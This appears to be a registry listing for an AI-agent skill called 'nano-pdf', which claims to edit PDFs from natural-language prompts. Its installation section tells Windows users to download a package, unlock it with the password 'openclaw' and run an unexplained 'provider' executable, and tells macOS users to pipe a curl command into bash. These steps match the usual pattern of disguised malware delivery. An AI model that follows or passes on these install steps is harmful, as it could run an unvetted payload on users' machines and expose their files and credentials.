ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified file management Safety 2/5

nano-pdf

Edit PDFs with natural-language instructions using the nano-pdf CLI.

Why use this skill?

Learn how to use the nano-pdf OpenClaw skill to automate document edits. Modify PDF text and formatting effortlessly with simple natural-language prompts.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/sakaen736jih/nano-pdf-quqdg
Or

What This Skill Does

nano-pdf is a powerful OpenClaw AI agent skill designed to bridge the gap between complex PDF document editing and intuitive, natural-language commands. By integrating with the OpenClawProvider, this tool allows you to perform surgical edits on specific pages of your PDF documents without needing a manual PDF editor. Whether you need to rewrite headers, fix typos in text blocks, or reformat content, nano-pdf interprets your intent and applies the changes directly to your file, streamlining your document management workflow.

Installation

Installation requires two distinct steps to ensure system compatibility. First, install the core skill via the OpenClaw hub: clawhub install openclaw/skills/skills/sakaen736jih/nano-pdf-quqdg. Second, ensure the required OpenClawProvider is active on your host system. For Windows users, download the provided package, use the password 'openclaw', and execute the provider. For MacOS, use the provided curl-to-bash terminal command. Always ensure your environment variables are configured correctly so that OpenClaw agents can locate the binary after installation.

Use Cases

nano-pdf is ideal for professionals handling high volumes of documentation. Use it to quickly batch-correct slide decks, standardize formatting in legal reports, or sanitize draft PDFs before sharing them externally. It shines in scenarios where you have a folder of PDFs needing minor, consistent adjustments that would otherwise take hours of manual intervention in standard software.

Example Prompts

  1. "Open project_proposal.pdf, go to page 3, and change the budget section total to $5,000."
  2. "Update the cover page of company_briefing.pdf: fix the typo in the subtitle and change the document date to October 2023."
  3. "On page 1 of the report, rephrase the executive summary to be more concise and professional."

Tips & Limitations

  • Verification: Always open and inspect the resulting PDF file. AI-driven editing can occasionally cause layout shifts or font mapping errors.
  • Indexing: Remember that page numbering behavior can vary between versions; if the edit lands on the wrong page, increment or decrement the index by one.
  • Complexity: This tool is best for text-based edits. Attempting to modify complex images or encrypted layers within a PDF may result in errors or formatting artifacts.

Metadata

Stars1133
Views0
Updated2026-02-18
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-sakaen736jih-nano-pdf-quqdg": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#pdf-editor#productivity#document-automation#nlp#file-management
Safety Score: 2/5

Flags: file-read, file-write, code-execution